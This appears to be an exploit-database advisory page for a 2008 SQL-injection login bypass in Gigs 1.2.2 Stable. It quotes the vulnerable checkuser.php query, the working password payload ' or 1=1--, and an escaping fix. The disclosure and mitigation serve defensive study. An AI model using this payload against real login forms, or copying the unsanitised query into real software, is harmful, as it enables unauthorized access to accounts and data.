header-logo
Suggest Exploit
vendor:
Gigs 1.2.2 Stable
by:
athos
7.5
CVSS
HIGH
Remote Login Bypass
89
CWE
Product Name: Gigs 1.2.2 Stable
Affected Version From: 1.2.2002
Affected Version To: 1.2.2002
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Gigs 1.2.2 Stable Remote Login Bypass Vulnerability

A vulnerability exists in Gigs 1.2.2 Stable, which allows an attacker to bypass authentication by sending a specially crafted request to the vulnerable application. This is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability to gain unauthorized access to the application.

Mitigation:

The application should properly sanitize user-supplied input before using it in an SQL query.
Source

Exploit-DB raw data:

/* ------------------------------------------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
 * ------------------------------------------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ------------------------------------------------------------------------------------------------
 * File Vuln checkuser.php
 *
 * 16. $username = $_POST['username'];
 * 17. $password = $_POST['password'];
 * ... 
 * 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
 * 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
 * ------------------------------------------------------------------------------------------------
 * Exploit
 *
 * http://[host]/[path]/index.php?id=login
 * 
 * Username: [username]
 * Password: [' or 1=1--]
 * ------------------------------------------------------------------------------------------------
 * Fix (Examples)
 *  
 * $username = mysql_real_escape_string($_POST['username']); 
 * $password = mysql_real_escape_string($_POST['password']);
 * 
 * ------------------------------------------------------------------------------------------------
 */

# milw0rm.com [2008-12-18]

Navigation

Suggest Exploit

Services By CQR